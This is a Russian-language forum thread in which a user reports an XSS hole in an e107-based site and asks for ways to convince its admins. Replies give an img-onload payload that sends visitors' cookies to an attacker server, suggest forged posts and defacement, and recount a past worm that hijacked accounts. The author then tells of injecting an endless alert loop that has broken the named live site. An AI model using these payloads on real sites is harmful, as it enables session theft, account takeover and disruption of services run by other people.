LINUX.ORG.RU
ФорумTalks

[js][bsod] коротко

 ,


0

0

Кто подскажет, как на JavaScript организовать сабж?
Есть форум на e107. Даже не только форум, а немалый ресурс. На прошлой неделе админ портала предложил мне найти у них хоть одну дыру:

"у нас движок тааак проработан! Ни одной дырки нет! Наш ревизор(?) перед переносом сайта каждую его строчку пересмотрел! Попробуйте у нас хоть одну найти, мы даже готовы за каждую заплатить!".

По этическим и личным соображениям от платы отказался, но обнаружил интереснейшую дырочку. e107 - движок не шибко молодой и известный (терпеть его не могу), поэтому такую дыру в нем я найти просто не ожидал.
Открою секрет - при создании новой темы в форуме, название темы не фильтруется. Практически совсем. Затолкал тцда строчку "><script>alert(1)</script><" и нажал на "предпросмотр", увидел messagebox и ох^Wудивился.

Админам об этом открытии честно сказал, но они только спрашивают "а как вы это сделали". Детсад?

Вобщем, до сих пор не исправили.

★★
[математикам]что такое mod?
[объясните] экономичность ARM

только что проверил на их. оф.форуме - там все спокойно, все нормально :) На сайте, который проверял, понятия не имею, какая версия, но они уверенно врут, что регулярно обновляются.

Ставил им разного рода алерты, конфирмы, редиректы - видят, но в дырку не верят :)
Выслушаю более вменяемый способ заставить поверить :)

vitroot ★★
() автор топика
Ответ на: комментарий от vitroot

> Выслушаю более вменяемый способ заставить поверить :)

Ну классический innerHTML используй, поменяй им логотип, напиши "анальное порабощение" вне шаблона, пости от имен других участников фигню (забыл название атаки, суть которой <img src="formpost.php?thread=12345&message=я+дибил+ололо">, после чего пост добавляется от имени залогиненого юзера)

В крайнем случае сделай ч0рный экран с надписью "owned" и картинкой из какого-то ужастика

EmStudio
()

Отошли себе кукисы с которыми заходит на форум зарегистрированный пользователь. Я так один раз делал, как раз в подобной ситуации. Успешно.

Miguel ★★★★★
()
Ответ на: комментарий от EmStudio

да речь-то идет о средствах JavaScript. Через js не сильно-то можно пошалить от имени тамошних пользователей

vitroot ★★
() автор топика
Ответ на: комментарий от vitroot

> да речь-то идет о средствах JavaScript. Через js не сильно-то можно пошалить от имени тамошних пользователей

Через JS можно делать на этом форуме всё, что может делать соответствующий пользователь.

Miguel ★★★★★
()
Ответ на: комментарий от vitroot

С помощью js пытаешься передать скрипту какие-нибудь команды, которые заведомо известно, что они будут выполнены.
Например: смена аватара, удаление пользователя, очистка чего-нибудь, правка чего-нибудь, распространение какой-то конфиденциальной информации (включая передачу куков постороннему ресурсу). Всё, на что фантазии хватит.
После того, как конкуренты разгромили серверную сервиса borda.ru, администратор сервиса принял нелегкое решение (суровые уроки реальности - всегда надо делать бекапы) перейти на новый движок (старый был утрачен из-за диверсии), основанный на YaBB. Так когда он его переписывал, он буквально являл собой решето, и всякие кулхацкеры только и занимались, что изголялись на js, как бы досадить всяким новым админчикам форумов и гостевых :)
Конечно, придется внимательно изучать код страниц и принципы работы скрипта, иначе результаты не будут такими занимательными.

Terrens
()
Ответ на: комментарий от vitroot

как пример - засунь картинку вида

<img src="http://myserver/somepic.png" id="cpic" width="0" height="0" onload="document.getElementById('cpic').src='http://myserver/script.php?cookie='+document.cookies;"/>

и воруй кукисы...потом с ними делай что хочешь-пости сообщения, меняй пароли (если нет подтверждения по мылу), на что только фантазии хватит..

когда в попе ещё детство играло бигмир был так помучан, там сервис есть "блоги", и собственно можно было картинку вставлять в сообщение...и парсер не обрабатывал onload свойство, за что собственно и был наказан. встроил туда жсскрипт, который воровал куки и отсылал на сервер, который в свою очередь менял ник на iesuxXXXX и пароль на 123321, и постил к себе в блог сообщение с этой же багой и заголовком "приветики"...при этом юзер оставался залогиненым, и при обновлении страницы действия повторялись. а так как там лента новостей была с последними записями со всех дневников то оно всё за секунды превратилось в хаос :)

такой же баг есть кстати и в дневниках на гала.нет

http://i.piccy.info/i3/ef/5d/0f95fb6ae445c6af52cf8e96ba98.jpeg

даже скриншот завалялся

vene4ka
()

Когда я был маленький и глупый, я пытался вести веб-сайт. На народе (лопата). Сайт давно умер, но бэкап я отыскал. И там, среди прочего, есть и такое:

http://www.math.uni-bielefeld.de/~mitrofan/urody/

Сорри, слишком много букав, чтобы постить здесь.

Miguel ★★★★★
()
Ответ на: комментарий от Miguel

затолкал скрипт
><script>while(1==1) {alert('Wellcome to ProIlim.ru!')}</script><

Итог:
Никто не может работать на сайте. Их подводит модуль "последние темы форума" на главной странице. Стоит рассказывать, какая там светится тема?

vitroot ★★
() автор топика
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
[математикам]что такое mod?
Talks
[объясните] экономичность ARM